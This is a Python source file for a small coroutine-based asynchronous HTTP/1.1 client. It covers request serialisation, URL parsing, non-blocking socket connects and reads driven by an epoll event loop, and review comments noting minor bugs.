def build_http_header_line(method, endpoint, header):
    """Serialize the request line plus header fields into raw HTTP text.

    Produces 'METHOD endpoint HTTP/1.1\\r\\n' followed by one
    'Name:value\\r\\n' line per header, terminated by the blank line that
    ends the header section.
    """
    lines = ["{} {} {}".format(method, endpoint, HTTP_VERSION)]
    for name in header:
        lines.append(name + ":" + header[name])
    # Two empty entries: one closes the last header line, one is the
    # blank separator line before the body.
    lines.append("")
    lines.append("")
    return "\r\n".join(lines)
def parse_host_port(url):
    """Split a plain-http URL into (host, port, endpoint).

    'http://example.com:8080/a/b' -> ('example.com', 8080, '/a/b')

    The port defaults to 80 and the endpoint to '/'.

    Fix: an explicitly given port is now converted to int — the original
    returned it as a string, which socket.connect() rejects for AF_INET
    addresses.
    """
    url = url.replace("http://", "")
    url_splits = url.split('/')
    host_port = url_splits[0].split(":")
    if len(host_port) == 1:
        host = host_port[0]
        port = 80
    else:
        host, port = host_port
        port = int(port)  # AF_INET address tuples require an int port
    if len(url_splits) > 1:
        end_point = "/" + "/".join(url_splits[1:])
    else:
        end_point = "/"
    return host, port, end_point
def add_default_header(header, host):
    """Return a copy of `header` overlaid with the module defaults and the
    mandatory HOST field; the caller's dict is never mutated."""
    merged = {**header, **DEFAULT_HEADER}
    merged["HOST"] = host
    return merged
def connect(host, port):
    """Coroutine: open a non-blocking TCP connection to (host, port).

    Registers the socket with the event loop, suspends on a Future until
    the fd becomes writable (i.e. the connect completed), then returns the
    connected socket.
    """
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    fd = client_socket.fileno()
    fd_manager.add_fd(fd, client_socket, "socket")
    client_socket.setblocking(False)
    try:
        client_socket.connect((host, port))
    except BlockingIOError:
        # Expected for a non-blocking connect in progress.
        pass
    future = Future("connect")
    def on_connected(fd, event):
        future.set_result(True)  # (6) set_result fires the future's callbacks; the Task's callback calls send(), resuming after the yield at (3); is_connected receives True
    loop.register(fd, select.EPOLLOUT, on_connected)
    is_connected = yield from future  # (3) yields the connect future back to Task._step's send() call and gives up control until the fd is writable
    loop.unregister(fd)
    return client_socket
def recv(client_socket):
    """Coroutine: read a full HTTP response from `client_socket`.

    Suspends on a Future each time it needs more bytes, parses the header
    once the blank line arrives, then keeps reading until exactly
    Content-Length body bytes have accumulated. Returns (header, body).
    Raises if the peer closes early or the response lacks Content-Length.
    """
    fd = client_socket.fileno()
    i = 0  # NOTE(review): never incremented, so every Future is named "recv0"
    header = {}
    read_buffer = b''
    is_header_read = False
    content_length = None
    while True:
        future = Future("recv" + str(i))
        def on_reachable(fd, event):
            chunked = client_socket.recv(1024)
            future.set_result(chunked)
        loop.register(fd, select.EPOLLIN, on_reachable)
        chunked = yield from future
        if chunked == b'':  # connection closed by the remote side
            loop.unregister(fd)
            client_socket.close()
            fd_manager.del_fd(fd)
            raise Exception('Remote connection close.')
        loop.unregister(fd)
        read_buffer += chunked
        if not is_header_read and b'\r\n\r\n' in read_buffer:  # header fully received: parse it
            head_finish_index = read_buffer.index(b'\r\n\r\n') + 4
            body_start_index = head_finish_index
            header_data = read_buffer[0:head_finish_index]
            read_buffer = read_buffer[body_start_index:]  # keep only the body part
            header = parse_http_response_header(header_data)
            if header.get("Content-Length"):
                content_length = int(header.get("Content-Length"))
                is_header_read = True
            else:
                # For now the response header must carry Content-Length
                # (chunked transfer encoding is not supported).
                raise Exception("content-length can't be empty")
        if is_header_read and len(read_buffer) == content_length:
            body_data = read_buffer
            fd_manager.del_fd(fd)
            return header, body_data
def request(method, url, header=None):
    """Coroutine: perform one HTTP request and return (header, body).

    Builds the request text, connects, sends, awaits the full response and
    closes the socket (CONNECTION: close is always sent).
    NOTE(review): `header` defaults to None but add_default_header() copies
    it with dict-unpacking semantics — callers must pass a dict.
    """
    assert url.startswith("http://")  # only plain http is supported for now
    method = method.upper()
    host, port, end_point = parse_host_port(url)
    header = add_default_header(header, host)
    request_msg = build_http_header_line(method, end_point, header)
    request_bytes = request_msg.encode('ascii')
    client_socket = yield from connect(host, port)
    client_socket.send(request_bytes)
    res_header, res_body = yield from recv(client_socket)
    client_socket.close()
    return res_header, res_body
# if __name__ == '__main__':
# from MyAsyncHttp.coroutine_version.task import Task
# def call_fun():
# res_header, res_body = yield from request("GET", "http://www.baidu.com", header=[])
# print(res_header)
# print(res_body)
#
#
# Task(call_fun())
# loop.start() | [
"447648965@qq.com"
] | 447648965@qq.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.